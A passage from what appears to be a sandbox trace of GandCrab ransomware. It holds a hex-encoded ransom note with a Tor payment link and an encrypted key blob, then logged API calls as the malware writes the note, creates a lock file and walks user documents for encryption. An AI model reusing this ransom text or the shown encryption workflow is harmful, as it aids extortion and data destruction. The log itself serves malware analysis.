\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0089.784] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0089.795] CloseHandle (hObject=0x2b4) returned 1 [0089.795] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.795] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.795] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x23, wMilliseconds=0x73)) [0089.795] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.796] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0089.796] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0089.796] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\d2ca4a09d2ca4deb61a.lock") returned 79 [0089.796] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0089.796] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.796] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.796] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\") returned 55 [0089.797] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\*" [0089.797] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x5035b8 [0089.797] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.797] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0089.797] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.797] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.797] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0089.797] lstrcmpW (lpString1="3M1hZqKtYrnXF.ots", lpString2=".") returned 1 [0089.797] lstrcmpW (lpString1="3M1hZqKtYrnXF.ots", lpString2="..") returned 1 [0089.797] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\", lpString2="3M1hZqKtYrnXF.ots" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3M1hZqKtYrnXF.ots") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3M1hZqKtYrnXF.ots" [0089.797] lstrlenW (lpString=".titwmvjl") returned 9 [0089.797] lstrlenW 